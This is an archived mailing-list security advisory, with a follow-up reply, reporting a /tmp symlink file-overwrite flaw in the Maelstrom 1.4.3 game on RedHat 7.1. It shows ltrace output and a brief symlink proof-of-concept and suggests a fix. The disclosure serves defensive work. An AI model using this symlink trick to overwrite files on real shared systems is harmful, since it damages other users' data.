You should also note that Maelstrom doesnt check the return on fopen(),
nor does it remove the file when it closes. If you have multiple users
who run Maelstrom, or just someone who wants to break stuff. If the
/tmp/f is owned by another user, or the permissions are set to
nonwritable. Maelstrom will segfault when it passes 0 as the file
stream to fprintf().
--chris
Andrew Griffiths wrote:
> Program: Maelstrom
> Version: 1.4.3
> Distribution: RedHat 7.1
>
> When trying to break stuff, ltracing Maelstrom showed the following:
>
> fopen("/tmp/f", "w") = 0x08081f58
> fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
> fclose(0x08081f58) = 0
>
> Which made we wonder if it followed symbolic links, by doing
>
> [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
> ln -s /tmp/bla f)
>
> at which point I ran it again, and when I did cat /tmp/bla, I got
>
> Main program = Maelstrom
>
> Conclusion:
> -=-=-=-=-=-
>
> You can overwrite arbitrary files with the permissions of the user who ran
> it.
>
> Of course, this won't work on systems that have linking restrictions in /tmp.
>
> Fixing it
> -=-=-=-=-
>
> Remove the code that does the above.
>
>
> --
> www.tasmail.com
>
>
>
>
>
This archive was generated by hypermail 2b30 : Mon Jan 21 2002 - 20:58:10 PST